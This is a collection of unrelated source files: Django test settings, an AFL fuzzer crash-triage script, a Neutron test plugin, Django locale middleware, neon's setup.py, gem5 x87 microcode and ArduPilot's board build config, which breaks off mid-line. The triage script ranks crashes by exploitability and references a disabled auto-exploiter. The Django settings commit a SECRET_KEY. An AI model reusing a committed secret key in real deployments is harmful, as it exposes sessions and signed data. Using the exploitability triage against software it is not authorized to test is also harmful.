USE_L10N = True # If you set this to False, Django will not use timezone-aware datetimes. USE_TZ = True # Absolute filesystem path to the directory that will hold user-uploaded files. # Example: "/home/media/media.lawrence.com/media/" MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash. # Examples: "http://media.lawrence.com/media/", "http://example.com/media/" MEDIA_URL = '' # Absolute path to the directory static files should be collected to. 
# Don't put anything in this directory yourself; store your static files # in apps' "static/" subdirectories and in STATICFILES_DIRS. # Example: "/home/media/media.lawrence.com/static/" STATIC_ROOT = 'test_static' # URL prefix for static files. # Example: "http://media.lawrence.com/static/" STATIC_URL = '/static/' # Additional locations of static files STATICFILES_DIRS = ( # Put strings here, like "/home/html/static" or "C:/www/django/static". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) # List of finder classes that know how to find static files in # various locations. STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', # 'django.contrib.staticfiles.finders.DefaultStorageFinder', ) # Make this unique, and don't share it with anybody. SECRET_KEY = 'n(bd1f1c%e8=_xad02x5qtfn%wgwpi492e$8_erx+d)!tpeoim' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', # 'django.template.loaders.eggs.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # Uncomment the next line for simple clickjacking protection: # 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'config.urls' # Python dotted path to the WSGI application used by Django's runserver. WSGI_APPLICATION = 'config.wsgi.application' TEMPLATE_DIRS = ( # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates". # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. 
) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', # Uncomment the next line to enable the admin: 'django.contrib.admin', # Uncomment the next line to enable admin documentation: # 'django.contrib.admindocs', ) # A sample logging configuration. The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } }
floyd-fuh/afl-crash-analyzer
refs/heads/master
AflCrashAnalyzer.py
1
#!/usr/bin/env python2.7 ''' AFL crash analyzer, crash triage for the American Fuzzy Lop fuzzer Copyright (C) 2015 floyd This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Created on Apr 13, 2015 @author: floyd, http://floyd.ch, @floyd_ch ''' from modules.FileDuplicateFinder import FileDuplicateFinder from modules.SignalFinder import SignalFinder from modules.OutputFinder import OutputFinder from modules.InputMinimizer import InputMinimizer from modules.FeelingLuckyExploiter import FeelingLuckyExploiter from modules.ExploitableGdbPlugin import ExploitableGdbPlugin from utilities.Logger import Logger import os import glob def analyze_output_and_exploitability(config, signal_finder, uninteresting_signals, message_prefix=""): for signal, signal_folder in signal_finder.get_folder_paths_for_signals_if_exist(uninteresting_signals): skip = False for cat in ExploitableGdbPlugin.get_classifications(): if os.path.exists(os.path.join(signal_folder, cat)): Logger.warning("Seems like there are already exploitability analysis results, skipping. 
If you want to rerun: rm -r %s" % os.path.join(signal_folder, cat)) skip = True if not skip: Logger.info(message_prefix, "Discover stdout, stderr, gdb and ASAN output (signal %s)" % signal) wildcard_for_run_output_files = os.path.join(signal_folder, "*" + config.run_extension) if glob.glob(wildcard_for_run_output_files): Logger.warning("Seems like there are already results from running the binaries, skipping. If you want to rerun: rm", wildcard_for_run_output_files) else: of = OutputFinder(config, signal_folder) of.do_sane_output_runs() Logger.info(message_prefix, "Analyzing exploitability (signal %s)" % signal) egp = ExploitableGdbPlugin(config, signal_folder) egp.divide_by_exploitability() def main(): # Read the README before you start. Logger.info("Setting up configuration") gdb_script_64bit = r"""printf "[+] Disabling verbose and complaints\n" set verbose off set complaints 0 printf "[+] Backtrace:\n" bt printf "[+] info reg:\n" info reg printf "[+] exploitable:\n" exploitable printf "[+] disassemble $rip, $rip+16:\n" disassemble $rip, $rip+16 printf "[+] list\n" list """ gdb_script_32bit = r"""printf "[+] Disabling verbose and complaints\n" set verbose off set complaints 0 printf "[+] Backtrace:\n" bt printf "[+] info reg:\n" info reg printf "[+] exploitable:\n" exploitable printf "[+] disassemble $eip, $eip+16:\n" disassemble $eip, $eip+16 printf "[+] list\n" list """ # TODO: Make sure gdb script doesn't abort on error # ignoring errors in gdb scripts: http://stackoverflow.com/questions/17923865/gdb-stops-in-a-command-file-if-there-is-an-error-how-to-continue-despite-the-er gdb_script_32bit_noerror = r"""python def my_ignore_errors(arg): try: gdb.execute("print \"" + "Executing command: " + arg + "\"") gdb.execute (arg) except: gdb.execute("print \"" + "ERROR: " + arg + "\"") my_ignore_errors("p p") my_ignore_errors("p p->v1") gdb.execute("quit") """ where_this_python_script_lives = os.path.dirname(os.path.realpath(__file__)) gdb_command = "/usr/bin/gdb" 
#gdb_command_osx = "/opt/local/bin/gdb-apple" #TODO: For some reason the ASAN environment variables are not correctly set when given to the subprocess module... so let's just set it in parent process already: os.environ['ASAN_SYMBOLIZER_PATH'] = "/usr/bin/llvm-symbolizer-3.4" os.environ['ASAN_OPTIONS'] = "symbolize=1:redzone=512:quarantine_size=512Mb:exitcode=1:abort_on_error=1" env={"ASAN_SYMBOLIZER_PATH": "/usr/bin/llvm-symbolizer-3.4", "ASAN_OPTIONS": "symbolize=1:redzone=512:quarantine_size=512Mb:exitcode=1:abort_on_error=1"} ### # This import decides which testcase/binary we want to run! ### from testcases.ffmpeg.Config import create_config #from testcases.ffmpeg.Config import create_config #see CrashAnalysisConfig for more options that get passed on by create_config chosen_config = create_config(where_this_python_script_lives, env=env, gdb_script=gdb_script_32bit, gdb_binary=gdb_command) chosen_config.sanity_check() # Logger.info("Input crashes directory operations") # Logger.info("Removing README.txt files") fdf = FileDuplicateFinder(chosen_config, chosen_config.original_crashes_directory) fdf.remove_readmes() Logger.info("Removing duplicates from original crashes folder (same file size + MD5)") fdf.delete_duplicates_recursively() Logger.info("Renaming files from original crashes folder so that the filename is a unique identifier. This allows us to copy all crash files into one directory (eg. for tmin output) if necessary, without name collisions") fdf.rename_same_name_files() #OR: #Logger.info("Renaming all files to numeric values, as some programs prefer no special chars in filenames and might require a specific file extension") #fdf.rename_all_files(".png") # Logger.info("Finding interesting signals (all crashes)") # sf_all_crashes = SignalFinder(chosen_config) if os.path.exists(chosen_config.default_signal_directory): Logger.warning("Seems like all crashes were already categorized by signal, skipping. 
If you want to rerun: rm -r", chosen_config.default_signal_directory) else: Logger.debug("Dividing files to output folder according to their signal") sf_all_crashes.divide_by_signal() #Interestings signals: negative on OSX, 129 and above sometimes for Linux on the shell (depending on used mechanism) #Uninteresting signals: We usually don't care about signals 0, 1, 2, etc. up to 128 uninteresting_signals = range(0, 129) analyze_output_and_exploitability(chosen_config, sf_all_crashes, uninteresting_signals, message_prefix="Interesting signals /") Logger.info("Interesting signals / Minimizing input (afl-tmin)") if os.path.exists(chosen_config.default_minimized_crashes_directory): Logger.warning("Seems like crashes were already minimized, skipping. If you want to rerun: rm -r", chosen_config.default_minimized_crashes_directory) else: for signal, signal_folder in sf_all_crashes.get_folder_paths_for_signals_if_exist(uninteresting_signals): Logger.debug("Minimizing inputs resulting in signal %i" % signal) im = InputMinimizer(chosen_config, signal_folder) im.minimize_testcases() Logger.info("Interesting signals / Minimized inputs / Deduplication") fdf_minimized = FileDuplicateFinder(chosen_config, chosen_config.default_minimized_crashes_directory) fdf_minimized.delete_duplicates_recursively() # Logger.info("Interesting signals / Minimized inputs / Finding interesting signals") # sf_minimized_crashes = SignalFinder(chosen_config, chosen_config.default_minimized_crashes_directory, os.path.join(chosen_config.output_dir, "minimized-per-signal")) if os.path.exists(sf_minimized_crashes.output_dir): Logger.warning("Seems like minimized crashes were already categorized by signal, skipping. 
If you want to rerun: rm -r", sf_minimized_crashes.output_dir) else: os.mkdir(sf_minimized_crashes.output_dir) Logger.info("Dividing files to output folder according to their signal") sf_minimized_crashes.divide_by_signal(0) analyze_output_and_exploitability(chosen_config, sf_minimized_crashes, uninteresting_signals, message_prefix="Interesting signals / Minimized inputs /") #TODO: #- Make (some) modules work as standalone applications with command line parsing #- The FeelingLuckyExplotier thing. Need to get a small test sample where I know it should work. # # If you are in the mood to waste a little CPU time, run this # Logger.info("Found interesting_signals (interesting interesting_signals) / Minimized inputs (interested interesting_signals) / Feeling lucky auto exploitation") # # # fle = FeelingLuckyExploiter(chosen_config, sf_minimized_crashes.output_dir) # #os.mkdir(fle.output_dir) # fle.run_forest_run() cleanup(chosen_config) def cleanup(config): for path, _, files in os.walk(config.tmp_dir): for filename in files: os.remove(os.path.join(path, filename)) if __name__ == "__main__": main()
yamt/neutron
refs/heads/master
quantum/tests/unit/metaplugin/fake_plugin.py
7
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright 2012, Nachi Ueno, NTT MCL, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from quantum.db import db_base_plugin_v2 from quantum.db import l3_db class Fake1(db_base_plugin_v2.QuantumDbPluginV2, l3_db.L3_NAT_db_mixin): supported_extension_aliases = ['router'] def fake_func(self): return 'fake1' def create_network(self, context, network): session = context.session with session.begin(subtransactions=True): net = super(Fake1, self).create_network(context, network) self._process_l3_create(context, network['network'], net['id']) self._extend_network_dict_l3(context, net) return net def update_network(self, context, id, network): session = context.session with session.begin(subtransactions=True): net = super(Fake1, self).update_network(context, id, network) self._process_l3_update(context, network['network'], id) self._extend_network_dict_l3(context, net) return net def delete_network(self, context, id): return super(Fake1, self).delete_network(context, id) def create_port(self, context, port): port = super(Fake1, self).create_port(context, port) return port def create_subnet(self, context, subnet): subnet = super(Fake1, self).create_subnet(context, subnet) return subnet def update_port(self, context, id, port): port = super(Fake1, self).update_port(context, id, port) return port def delete_port(self, context, id, l3_port_check=True): return super(Fake1, self).delete_port(context, id) class Fake2(Fake1): def fake_func(self): 
return 'fake2' def fake_func2(self): return 'fake2'
pigeonflight/strider-plone
refs/heads/master
docker/appengine/lib/django-1.5/django/middleware/locale.py
102
"This is the locale selecting middleware that will look at accept headers" from django.conf import settings from django.core.urlresolvers import (is_valid_path, get_resolver, LocaleRegexURLResolver) from django.http import HttpResponseRedirect from django.utils.cache import patch_vary_headers from django.utils import translation class LocaleMiddleware(object): """ This is a very simple middleware that parses a request and decides what translation object to install in the current thread context. This allows pages to be dynamically translated to the language the user desires (if the language is available, of course). """ def process_request(self, request): check_path = self.is_language_prefix_patterns_used() language = translation.get_language_from_request( request, check_path=check_path) translation.activate(language) request.LANGUAGE_CODE = translation.get_language() def process_response(self, request, response): language = translation.get_language() if (response.status_code == 404 and not translation.get_language_from_path(request.path_info) and self.is_language_prefix_patterns_used()): urlconf = getattr(request, 'urlconf', None) language_path = '/%s%s' % (language, request.path_info) path_valid = is_valid_path(language_path, urlconf) if (not path_valid and settings.APPEND_SLASH and not language_path.endswith('/')): path_valid = is_valid_path("%s/" % language_path, urlconf) if path_valid: language_url = "%s://%s/%s%s" % ( request.is_secure() and 'https' or 'http', request.get_host(), language, request.get_full_path()) return HttpResponseRedirect(language_url) translation.deactivate() patch_vary_headers(response, ('Accept-Language',)) if 'Content-Language' not in response: response['Content-Language'] = language return response def is_language_prefix_patterns_used(self): """ Returns `True` if the `LocaleRegexURLResolver` is used at root level of the urlpatterns, else it returns `False`. 
""" for url_pattern in get_resolver(None).url_patterns: if isinstance(url_pattern, LocaleRegexURLResolver): return True return False
dongjoon-hyun/neon
refs/heads/master
setup.py
2
#!/usr/bin/env python # ---------------------------------------------------------------------------- # Copyright 2015 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- import os from setuptools import setup, find_packages, Command import subprocess # Define version information VERSION = '1.3.0' FULLVERSION = VERSION write_version = True try: pipe = subprocess.Popen(["git", "rev-parse", "--short", "HEAD"], stdout=subprocess.PIPE) (so, serr) = pipe.communicate() if pipe.returncode == 0: FULLVERSION += "+%s" % so.strip().decode("utf-8") except: pass if write_version: txt = "# " + ("-" * 77) + "\n" txt += "# Copyright 2015 Nervana Systems Inc.\n" txt += "# Licensed under the Apache License, Version 2.0 " txt += "(the \"License\");\n" txt += "# you may not use this file except in compliance with the " txt += "License.\n" txt += "# You may obtain a copy of the License at\n" txt += "#\n" txt += "# http://www.apache.org/licenses/LICENSE-2.0\n" txt += "#\n" txt += "# Unless required by applicable law or agreed to in writing, " txt += "software\n" txt += "# distributed under the License is distributed on an \"AS IS\" " txt += "BASIS,\n" txt += "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or " txt += "implied.\n" txt += "# See the License for the specific language governing permissions " txt += "and\n" txt += "# limitations under the License.\n" txt += "# " + ("-" * 77) + "\n" 
txt += "\"\"\"\n%s\n\"\"\"\nVERSION = '%s'\nSHORT_VERSION = '%s'\n" fname = os.path.join(os.path.dirname(__file__), 'neon', 'version.py') a = open(fname, 'w') try: a.write(txt % ("Project version information.", FULLVERSION, VERSION)) finally: a.close() setup(name='neon', version=VERSION, description="Nervana's deep learning framework", long_description=open('README.md').read(), author='Nervana Systems', author_email='info@nervanasys.com', url='http://www.nervanasys.com', license='License :: OSI Approved :: Apache Software License', scripts=['bin/neon', 'bin/nvis'], packages=find_packages(exclude=["tests"]), package_data={'neon': ['backends/kernels/sass/*.sass', 'backends/kernels/cubin/*.cubin', 'data/loader/*.so']}, classifiers=['Development Status :: 3 - Alpha', 'Environment :: Console', 'Environment :: Console :: Curses', 'Environment :: Web Environment', 'Intended Audience :: End Users/Desktop', 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Operating System :: POSIX', 'Operating System :: MacOS :: MacOS X', 'Programming Language :: Python', 'Topic :: Scientific/Engineering :: ' + 'Artificial Intelligence', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: System :: Distributed Computing'])
PetrDlouhy/django
refs/heads/master
tests/migrations2/models.py
560
# Required for migration detection (#22645)
SanchayanMaity/gem5
refs/heads/CS570
src/arch/x86/isa/insts/x87/arithmetic/addition.py
50
# Copyright (c) 2007 The Hewlett-Packard Development Company # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Gabe Black microcode = ''' def macroop FADD1_R { addfp st(0), sti, st(0) }; def macroop FADD1_M { ldfp ufp1, seg, sib, disp addfp st(0), st(0), ufp1 }; def macroop FADD1_P { rdip t7 ldfp ufp1, seg, riprel, disp addfp st(0), st(0), ufp1 }; def macroop FADD2_R { addfp sti, sti, st(0) }; def macroop FADD2_M { ldfp ufp1, seg, sib, disp addfp st(0), st(0), ufp1 }; def macroop FADD2_P { rdip t7 ldfp ufp1, seg, riprel, disp addfp st(0), st(0), ufp1 }; def macroop FADDP { addfp st(1), st(0), st(1), spm=1 }; def macroop FADDP_R { addfp sti, sti, st(0), spm=1 }; def macroop FADDP_M { fault "std::make_shared<UnimpInstFault>()" }; def macroop FADDP_P { fault "std::make_shared<UnimpInstFault>()" }; # FIADD '''
phoneguy/ardupilot
refs/heads/master
Tools/ardupilotwaf/boards.py
5
#!/usr/bin/env python # encoding: utf-8 from collections import OrderedDict import sys import waflib from waflib.Configure import conf _board_classes = {} class BoardMeta(type): def __init__(cls, name, bases, dct): super(BoardMeta, cls).__init__(name, bases, dct) if 'abstract' not in cls.__dict__: cls.abstract = False if cls.abstract: return if not hasattr(cls, 'toolchain'): cls.toolchain = 'native' board_name = getattr(cls, 'name', name) if board_name in _board_classes: raise Exception('board named %s already exists' % board_name) _board_classes[board_name] = cls class Board: abstract = True def __init__(self): self.with_uavcan = False def configure(self, cfg): cfg.env.TOOLCHAIN = self.toolchain cfg.load('toolchain') cfg.load('cxx_checks') env = waflib.ConfigSet.ConfigSet() self.configure_env(cfg, env) d = env.get_merged_dict() # Always prepend so that arguments passed in the command line get # the priority. for k, val in d.items(): # Dictionaries (like 'DEFINES') are converted to lists to # conform to waf conventions. if isinstance(val, dict): keys = list(val.keys()) if not isinstance(val, OrderedDict): keys.sort() val = ['%s=%s' % (vk, val[vk]) for vk in keys] if k in cfg.env and isinstance(cfg.env[k], list): cfg.env.prepend_value(k, val) else: cfg.env[k] = val cfg.ap_common_checks() cfg.env.prepend_value('INCLUDES', [ cfg.srcnode.find_dir('libraries/AP_Common/missing').abspath() ]) def configure_env(self, cfg, env): # Use a dictionary instead of the convetional list for definitions to # make easy to override them. Convert back to list before consumption. 
env.DEFINES = {} env.CFLAGS += [ '-ffunction-sections', '-fdata-sections', '-fsigned-char', '-Wall', '-Wextra', '-Wformat', '-Wshadow', '-Wpointer-arith', '-Wcast-align', '-Wundef', '-Wno-missing-field-initializers', '-Wno-unused-parameter', '-Wno-redundant-decls', '-Wno-unknown-pragmas', ] if 'clang' in cfg.env.COMPILER_CC: env.CFLAGS += [ '-fcolor-diagnostics', '-Wno-gnu-designator', '-Wno-inconsistent-missing-override', '-Wno-mismatched-tags', '-Wno-gnu-variable-sized-type-not-at-end', '-Wno-c++11-narrowing' ] if cfg.env.DEBUG: env.CFLAGS += [ '-g', '-O0', ] env.CXXFLAGS += [ '-std=gnu++11', '-fdata-sections', '-ffunction-sections', '-fno-exceptions', '-fsigned-char', '-Wall', '-Wextra', '-Wformat', '-Wshadow', '-Wpointer-arith', '-Wcast-align', '-Wundef', '-Wno-unused-parameter', '-Wno-missing-field-initializers', '-Wno-reorder', '-Wno-redundant-decls', '-Wno-unknown-pragmas', '-Werror=format-security', '-Werror=array-bounds', '-Werror=uninitialized', '-Werror=init-self', '-Werror=switch', '-Wfatal-errors', ] if 'clang++' in cfg.env.COMPILER_CXX: env.CXXFLAGS += [ '-fcolor-diagnostics', '-Wno-gnu-designator', '-Wno-inconsistent-missing-override', '-Wno-mismatched-tags', '-Wno-gnu-variable-sized-type-not-at-end', '-Wno-c++11-narrowing' ] else: env.CXXFLAGS += [ '-Werror=unused-but-set-variable' ] if cfg.env.DEBUG: env.CXXFLAGS += [ '-g', '-O0', ] if cfg.env.DEST_OS == 'darwin': env.LINKFLAGS += [ '-Wl,-dead_strip', ] else: env.LINKFLAGS += [ '-Wl,--gc-sections', ] if self.with_uavcan: env.AP_LIBRARIES += [ 'AP_UAVCAN', 'modules/uavcan/libuavcan/src/**/*.cpp' ] env.CXXFLAGS += [ '-Wno-error=cast-align', ] env.DEFINES.update( UAVCAN_CPP_VERSION = 'UAVCAN_CPP03', UAVCAN_NO_ASSERTIONS = 1, UAVCAN_NULLPTR = 'nullptr' ) env.INCLUDES += [ cfg.srcnode.find_dir('modules/uavcan/libuavcan/include').abspath() ] # We always want to use PRI format macros cfg.define('__STDC_FORMAT_MACROS', 1) def build(self, bld): bld.ap_version_append_str('GIT_VERSION', 
bld.git_head_hash(short=True)) Board = BoardMeta('Board', Board.__bases__, dict(Board.__dict__)) def get_boards_names(): return sorted(list(_board_classes.keys())) _board = None @conf def get_board(ctx): global _board if not _board: if not ctx.env.BOARD: ctx.fatal('BOARD environment variable must be set before first call to get_board()') _board = _board_classes[ctx.env.BOARD]() return _board # NOTE: Keeping all the board definitions together so we can easily # identify opportunities to simplify common flags. In the future might # be worthy to keep board definitions in files of their own. class sitl(Board): def configure_env(self, cfg, env): super(sitl, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_SITL', CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_NONE', ) if not cfg.env.DEBUG: env.CXXFLAGS += [ '-O3', ] env.LIB += [ 'm', ] cfg.check_librt(env) env.LINKFLAGS += ['-pthread',] env.AP_LIBRARIES += [ 'AP_HAL_SITL', 'SITL', ] if sys.platform == 'cygwin': env.LIB += [ 'winmm', ] class linux(Board): def configure_env(self, cfg, env): super(linux, self).configure_env(cfg, env) cfg.find_toolchain_program('pkg-config', var='PKGCONFIG') env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_LINUX', CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NONE', ) if not cfg.env.DEBUG: env.CXXFLAGS += [ '-O3', ] env.LIB += [ 'm', ] cfg.check_librt(env) cfg.check_lttng(env) cfg.check_libdl(env) cfg.check_libiio(env) env.LINKFLAGS += ['-pthread',] env.AP_LIBRARIES = [ 'AP_HAL_Linux', ] class minlure(linux): def configure_env(self, cfg, env): super(minlure, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_MINLURE', ) class erleboard(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(erleboard, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ERLEBOARD', ) class navio(linux): toolchain = 'arm-linux-gnueabihf' def 
configure_env(self, cfg, env): super(navio, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NAVIO', ) class navio2(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(navio2, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_NAVIO2', ) class zynq(linux): toolchain = 'arm-xilinx-linux-gnueabi' def configure_env(self, cfg, env): super(zynq, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ZYNQ', ) class bbbmini(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bbbmini, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BBBMINI', ) class blue(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(blue, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BLUE', ) class pxf(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(pxf, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_PXF', ) class bebop(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bebop, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BEBOP', ) class disco(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(disco, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_DISCO', ) class raspilot(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(raspilot, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_RASPILOT', ) class erlebrain2(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(erlebrain2, 
self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_ERLEBRAIN2', ) class bhat(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(bhat, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_BH', ) class dark(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(dark, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_DARK', ) class urus(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(urus, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_URUS', ) class pxfmini(linux): toolchain = 'arm-linux-gnueabihf' def configure_env(self, cfg, env): super(pxfmini, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_PXFMINI', ) class aero(linux): def configure_env(self, cfg, env): super(aero, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD_SUBTYPE = 'HAL_BOARD_SUBTYPE_LINUX_AERO', ) class px4(Board): abstract = True toolchain = 'arm-none-eabi' def __init__(self): # bootloader name: a file with that name will be used and installed # on ROMFS super(px4, self).__init__() self.bootloader_name = None # board name: it's the name of this board that's also used as path # in ROMFS: don't add spaces self.board_name = None # px4io binary name: this is the name of the IO binary to be installed # in ROMFS self.px4io_name = None # board-specific init script: if True a file with `board_name` name will # be searched for in sources and installed in ROMFS as rc.board. This # init script is used to change the init behavior among different boards. 
self.board_rc = False self.ROMFS_EXCLUDE = [] def configure(self, cfg): if not self.bootloader_name: cfg.fatal('configure: px4: bootloader name is required') if not self.board_name: cfg.fatal('configure: px4: board name is required') super(px4, self).configure(cfg) cfg.load('px4') def configure_env(self, cfg, env): super(px4, self).configure_env(cfg, env) env.DEFINES.update( CONFIG_HAL_BOARD = 'HAL_BOARD_PX4', HAVE_OCLOEXEC = 0, HAVE_STD_NULLPTR_T = 0, ) env.CXXFLAGS += [ '-Wlogical-op', '-Wframe-larger-than=1300', '-fsingle-precision-constant', '-Wno-error=double-promotion', '-Wno-error=missing-declarations', '-Wno-error=float-equal', '-Wno-error=undef', '-Wno-error=cpp', ] env.AP_LIBRARIES += [ 'AP_HAL_PX4', ] env.GIT_SUBMODULES += [ 'PX4Firmware', 'PX4NuttX', 'uavcan', ] env.ROMFS_EXCLUDE = self.ROMFS_EXCLUDE env.PX4_BOOTLOADER_NAME = self.bootloader_name env.PX4_BOARD_NAME = self.board_name env.PX4_BOARD_RC = self.board_rc env.PX4_PX4IO_NAME = self.px4io_name env.AP_PROGRAM_AS_STLIB = True def build(self, bld): super(px4, self).build(bld) bld.ap_version_append_str('NUTTX_GIT_VERSION', bld.git_submodule_head_hash('PX4NuttX', short=True)) bld.ap_version_append_str('PX4_GIT_VERSION', bld.git_submodule_head_hash('PX4Firmware', short=True)) bld.load('px4') def romfs_exclude(self, 